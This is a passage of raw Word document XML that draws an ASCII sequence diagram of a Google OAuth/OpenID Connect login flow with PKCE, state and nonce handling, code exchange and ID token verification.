                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│ 3. navigate (</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>client_id</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">, </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>redirect_uri</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">, state, </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">nonce,   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">  │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2441" o:spid="_x0000_s1325" style="position:absolute;left:1007;top:23838;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f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DJoZ9rHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="17D3E41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42" o:spid="_x0000_s1326" style="position:absolute;left:3186;top:23838;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mt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MK6+a3HAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="08B82DA2" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">│              </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>code_challenge</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>, S256, scope=</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>openid</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>email)  │</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2443" o:spid="_x0000_s1327" style="position:absolute;left:1007;top:25553;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w2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rfZcNsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5AB7A0D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44" o:spid="_x0000_s1328" style="position:absolute;left:3186;top:25553;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RCxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvulFC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CIfxELHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4B4242BF"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2445" o:spid="_x0000_s1329" style="position:absolute;left:1007;top:27267;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HZ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TVNh2cYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6368CC62"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46" o:spid="_x0000_s1330" style="position:absolute;left:3186;top:27267;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uxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvgv8hPGFvmq6I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C9gf+uxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2DD0E9C3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│                            │           user consents    │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2447" o:spid="_x0000_s1331" style="position:absolute;left:1007;top:29077;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o1xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC36H8ARva6qI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0s1aNcYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="42F98D76"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48" o:spid="_x0000_s1332" style="position:absolute;left:3186;top:29077;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5HwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L/kO4wuw0VWT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KNSzkfBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0501DCB6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">│ 4. </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>redirect ?code</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>=…&amp;state=…                             │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2449" o:spid="_x0000_s1333" style="position:absolute;left:1007;top:30791;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mvcxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvgv8hPGFvmioi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DMHmvcxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5B1337C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50" o:spid="_x0000_s1334" style="position:absolute;left:3186;top:30791;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cwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L+x/CLHjTdGUV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2P1UnMMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="150053F6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│◄────────────────────────────────────────────────────────┤</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2451" o:spid="_x0000_s1335" style="position:absolute;left:1007;top:32506;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fEHxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvwn6H8Ba8aaqo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t7HxB8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="7DD4B99F"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52" o:spid="_x0000_s1336" style="position:absolute;left:3186;top:32506;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29wxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6azYNV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Edjb3DHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4E9B7C2F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│                            │                            │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2453" o:spid="_x0000_s1337" style="position:absolute;left:1007;top:34220;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8r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xm9wfROegJxfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACgvyuvHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6C6EEC57"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54" o:spid="_x0000_s1338" style="position:absolute;left:3186;top:34220;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6AB51A41" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">│ 5. POST /auth/google/callback {code, </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">state}   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">          │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2455" o:spid="_x0000_s1339" style="position:absolute;left:1007;top:35935;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cExgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hPMGbpiur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yIr3BMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="320057B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56" o:spid="_x0000_s1340" style="position:absolute;left:3186;top:35935;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14:paraId="502D3EC6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>├───────────────────────────►│                            │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2457" o:spid="_x0000_s1341" style="position:absolute;left:1007;top:37649;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zoxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6q5tKt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FcUzOjHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6669CD71"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58" o:spid="_x0000_s1342" style="position:absolute;left:3186;top:37649;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iawwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L+x/CLHjTdGUV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JotYmsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5D0F6BFA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│                            │ consume state (</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">delete)   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">  │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2459" o:spid="_x0000_s1343" style="position:absolute;left:1007;top:39364;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BxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heQVvuqlYMTGriK3osWoh9fbIviah2bchu5q0v75bEDwOM/MNk657U4sbta6yrOB5EoEg&#10;zq2uuFDwcd6NFyCcR9ZYWyYFP+RgvRoOUky07fhIt5MvRICwS1BB6X2TSOnykgy6iW2Ig/dlW4M+&#10;yLaQusUuwE0tp1E0lwYrDgslNrQtKf8+XY2C/aLZfB7sb1fUb5d99p7Fr+fYKzV66jdLEJ56/wjf&#10;2wetYDp7ieH/TXgCcvUHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAScf9AcYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3D69EC6D"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60" o:spid="_x0000_s1344" style="position:absolute;left:3186;top:39364;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4hwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN7qxi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FpGeIcMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4AEF6426" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">│                            │ 6. exchange </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>code+</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>verifier</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">  │</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2461" o:spid="_x0000_s1345" style="position:absolute;left:1007;top:41078;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Tu6xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8oTezCZS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ed07usYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="626FB60A"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62" o:spid="_x0000_s1346" style="position:absolute;left:3186;top:41078;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14:paraId="20F2085A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│                            ├───────────────────────────►│</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2463" o:spid="_x0000_s1347" style="position:absolute;left:1007;top:42793;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BW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OZDAFbHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5DC694B9"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64" o:spid="_x0000_s1348" style="position:absolute;left:3186;top:42793;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28367720" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│                            │ 7. {</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>id_token</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>, …}           │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2465" o:spid="_x0000_s1349" style="position:absolute;left:1007;top:44507;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1CC73365"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66" o:spid="_x0000_s1350" style="position:absolute;left:3186;top:44507;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KPOxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC/sdwlvwtqYrUr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D2NKPOxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4BABD02C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│                            │◄───────────────────────────┤</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2467" o:spid="_x0000_s1351" style="position:absolute;left:1007;top:46222;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47AF3F5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68" o:spid="_x0000_s1352" style="position:absolute;left:3186;top:46222;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5InwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN7qxi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6OeSJ8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0F8AF2A0" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">│                            │ 8. VERIFY (8 </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">checks)   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">    │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
